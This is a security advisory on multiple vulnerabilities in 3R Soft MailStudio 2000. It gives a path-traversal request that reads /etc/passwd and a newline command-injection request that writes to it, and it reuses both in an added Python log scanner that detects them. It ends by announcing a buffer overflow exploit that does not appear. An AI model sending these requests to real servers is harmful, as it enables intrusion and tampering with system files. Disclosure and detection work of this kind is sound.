3R Soft MailStudio 2000 Multiple Vulnerabilities

s0ftpr0ject <http://www.s0ftpj.org> has provided the following exploits:

Mail view vulnerability:
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd

userreg.cgi vulnerability:
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
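
The two requests above, turned into a web-server log check (an added example, not part of the original advisory or the vendor's code). It flags a `..` path segment in the `html` parameter of mailview.cgi and any control character, such as the `%0a` newline, in a userreg.cgi field. The `/cgi-bin/` prefix, the log lines and the benign `html=1` value are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Control characters that should never appear in a decoded form field.
CONTROL = re.compile(r"[\x00-\x1f\x7f]")
# Request target inside a common/combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes each value once, so %0a becomes "\n".
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if script == "mailview.cgi" and name == "html":
            if ".." in re.split(r"[\\/]", value):
                findings.append("mailview.cgi html: parent-directory segment")
        if script == "userreg.cgi" and CONTROL.search(value):
            findings.append(f"userreg.cgi {name}: control character in field")
    return findings

def scan_log(lines):
    """Return (line_number, finding) pairs for a list of access-log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, f) for f in inspect_request(match.group(1)))
    return hits

# Constructed sample log: line 1 is benign, lines 2-3 carry the page's requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/mailview.cgi'
    '?cmd=view&fldrname=inbox&select=1&html=1 HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2001:10:05:00 +0000] "GET /cgi-bin/mailview.cgi'
    '?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd'
    ' HTTP/1.0" 200 1024',
    '198.51.100.7 - - [01/Jan/2001:10:06:00 +0000] "GET /cgi-bin/userreg.cgi'
    '?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>'
    '/etc/passwd HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```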


Fyodor <fygrave@tigerteam.net> has provided the following exploit for the buffer overflow:


 
